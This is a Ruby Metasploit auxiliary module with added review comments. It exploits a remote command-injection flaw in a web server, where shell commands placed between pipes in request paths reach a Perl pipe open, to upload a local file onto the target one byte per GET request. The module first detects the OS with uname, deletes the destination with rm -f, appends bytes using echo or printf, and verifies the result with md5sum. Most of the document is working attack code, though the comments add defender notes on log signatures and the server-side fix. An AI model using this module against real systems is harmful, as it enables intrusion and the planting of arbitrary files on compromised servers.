- ##
- # $Id: perlpipe_rce_to_file_osdetect.rb 13018 2011-06-24 14:43:59Z oxagast $
- ##
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # Framework web site for more information on licensing and terms of use.
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
- require 'net/http'
- require 'uri'
- require 'digest/md5'
- # Metasploit auxiliary module that copies a local file to a web host by
- # issuing HTTP GET requests whose path carries shell commands between pipes.
- #
- # Every request built below has the shape FIRSTPART + "|<command>|" + LASTPART
- # and is sent with Net::HTTP.start(host, port) and no TLS option, i.e. plain HTTP.
- # The commands visible in this class are uname, rm -f, appends with ">>"
- # (echo -n -e, printf or echo depending on the detected OS) and md5sum.
- # Defender view: a transfer appears in web access logs as one such GET per
- # byte of the file, all naming the same REMOTEFILE path.
- #
- # NOTE(review): the server-side flaw this depends on is not shown here; the
- # $Id filename (perlpipe_rce_...) suggests request data reaching a Perl pipe
- # open -- confirm. The server-side fix is to keep request data out of shell
- # and pipe-open arguments.
- class Metasploit3 < Msf::Auxiliary
- # Report mixin is included; no report_* call is visible in this class.
- include Msf::Auxiliary::Report
- # Registers module metadata and options.
- # Required: DOMAIN, REMOTEFILE, LOCALFILE, FIRSTPART. Optional: LASTPART.
- # Advanced (optional): PROXY, PROXY_USER, PROXY_PASS.
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Uses RCE on a webserver to upload files',
- 'Description' => %q{
- This module pushes data into a file with webserver RCE bugs that block downloading
- from external sources due to firewall rules.
- },
- 'Author' => [ 'Marshall Whittaker <oxagast [at] gmail.com>' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 13581 $'
- ))
- register_options(
- [
- # DOMAIN is passed to URI.parse in #run; only its host and port are used.
- OptString.new('DOMAIN', [ true, "The domain"]),
- OptString.new('REMOTEFILE', [ true, "Where to output the file on the remote server"]),
- OptString.new('LOCALFILE', [ true, "Location of the file you wish to send"]),
- # FIRSTPART / LASTPART wrap the "|command|" text in every request path.
- OptString.new('FIRSTPART', [ true, "First part of the url"]),
- OptString.new('LASTPART', [ false, "Last part of the url"]),
- ], self.class)
- register_advanced_options(
- [
- OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
- OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
- OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
- ], self.class)
- end
- # Reads LOCALFILE, asks the remote host for its OS via "uname", then appends
- # the file to REMOTEFILE one byte per request using an OS-specific encoding.
- # Prints status lines; returns nothing meaningful.
- def run
- # The proxy settings are only stored in instance variables. None of the
- # Net::HTTP.start calls below receive them, so the requests in this method
- # are made directly to the host parsed from DOMAIN.
- if datastore['PROXY']
- @proxysrv,@proxyport = datastore['PROXY'].split(":")
- @proxyuser = datastore['PROXY_USER']
- @proxypass = datastore['PROXY_PASS']
- else
- @proxysrv,@proxyport = nil, nil
- end
- # chunksize 1 with a five-character unit: each Linux hex escape built below
- # is two backslashes, "x" and two hex digits, so one file byte per request.
- chunksize = 1
- part2 = ""
- hexxydots = (chunksize * 5)
- thisurl = datastore['DOMAIN']
- localfilepath = datastore['LOCALFILE']
- remotefilepath = datastore['REMOTEFILE']
- part1 = datastore['FIRSTPART']
- # Overwrites the "" default above; LASTPART is optional, so this may be nil
- # (nil interpolates as an empty string in the request strings below).
- part2 = datastore['LASTPART']
- # Whole file is read into memory.
- # NOTE(review): this is Kernel#open, which runs a command when the path
- # starts with "|"; File.open / File.binread would not.
- thefile = open(localfilepath, "rb") {|io| io.read}
- # Local MD5, compared against the remote md5sum output in the Linux branch only.
- md5checksum = Digest::MD5.hexdigest(thefile)
- url = URI.parse(thisurl)
- # OS probe: one GET carrying "|uname|".
- # NOTE(review): URI.encode is obsolete and was removed in Ruby 3.0.
- oschecker = Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode("#{part1}|uname|#{part2}"))}
- # Each test is independent, so a later match overrides an earlier one.
- # If nothing matches, oscheck stays nil and the method ends without
- # sending anything or printing a message.
- if oschecker.body =~ /Linux/
- oscheck = 0
- end
- if oschecker.body =~ /BSD/
- oscheck = 1
- end
- if oschecker.body =~ /Solaris/
- oscheck = 2
- end
- if oschecker.body =~ /SunOS/
- oscheck = 2
- end
- # --- Linux: hex escapes appended with "echo -n -e" ---
- if oscheck == 0
- print_status "Detected OS : Linux"
- # One hex escape per byte, joined into a single string ...
- hexer = (thefile.unpack('H2'*thefile.length).collect {|val| "\\\\x" + val}).join
- # ... then cut back into five-character units and grouped chunksize at a time.
- hexxy = hexer.scan(/.{#{hexxydots}}/)
- inchunks = hexxy.each_slice(chunksize).to_a
- url1 = URI.parse(thisurl)
- print_status "Trying to remove remote file"
- # REMOTEFILE is interpolated unquoted into the command text, here and below.
- Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
- print_status "Sending file #{localfilepath}"
- # One GET per chunk; each appends to REMOTEFILE with ">>".
- for i in 0..inchunks.length - 1
- toecho = "#{part1}|echo -n -e \"#{inchunks[i].join}\" >> #{remotefilepath}|#{part2}"
- url = URI.parse(thisurl)
- Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
- end
- # Integrity check: looks for the local MD5 in the md5sum response body.
- # A mismatch prints nothing.
- checkedsum = Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode("#{part1}|md5sum #{remotefilepath}|#{part2}"))}
- if checkedsum.body =~ /#{Regexp.escape(md5checksum)}/
- print_status "MD5 checksum matches"
- end
- end
- # --- BSD: octal escapes appended with printf; no checksum comparison here ---
- if oscheck == 1
- print_status "Detected OS : BSD"
- # Each byte becomes a "0x"-prefixed hex string.
- hexer = (thefile.unpack('H2'*thefile.length)).collect {|hexstuff| "0x" + hexstuff.to_s}
- octal=[]
- # Formats each value as a backslash, "0" and its octal digits; relies on
- # %o converting the "0x.." string to an integer.
- for hexroll in 0..hexer.length - 1
- octalstr = "\\0%o" % hexer[hexroll]
- octal.push(octalstr)
- end
- url1 = URI.parse(thisurl)
- print_status "Trying to remove remote file"
- Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
- print_status "Sending file #{localfilepath}"
- # One GET per byte.
- for i in 0..octal.length - 1
- toecho = "#{part1}|printf \"#{octal[i]}\" >> #{remotefilepath}|#{part2}"
- url = URI.parse(thisurl)
- Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
- end
- end
- # --- SunOS/Solaris: zero-padded octal escapes appended with echo and a
- # trailing \c; no checksum comparison here ---
- if oscheck == 2
- print_status "Detected OS : SunOS/Solaris"
- hexer = (thefile.unpack('H2'*thefile.length)).collect {|hexstuff| "0x" + hexstuff.to_s}
- octal=[]
- # Backslash followed by the value as four zero-padded octal digits.
- for hexroll in 0..hexer.length - 1
- octalstr = "\\%04o" % hexer[hexroll]
- octal.push(octalstr)
- end
- url1 = URI.parse(thisurl)
- print_status "Trying to remove remote file"
- Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
- print_status "Sending file #{localfilepath}"
- # One GET per byte.
- for i in 0..octal.length - 1
- toecho = "#{part1}|echo \"#{octal[i]}\\c\" >> #{remotefilepath}|#{part2}"
- url = URI.parse(thisurl)
- Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
- end
- end
- end
- end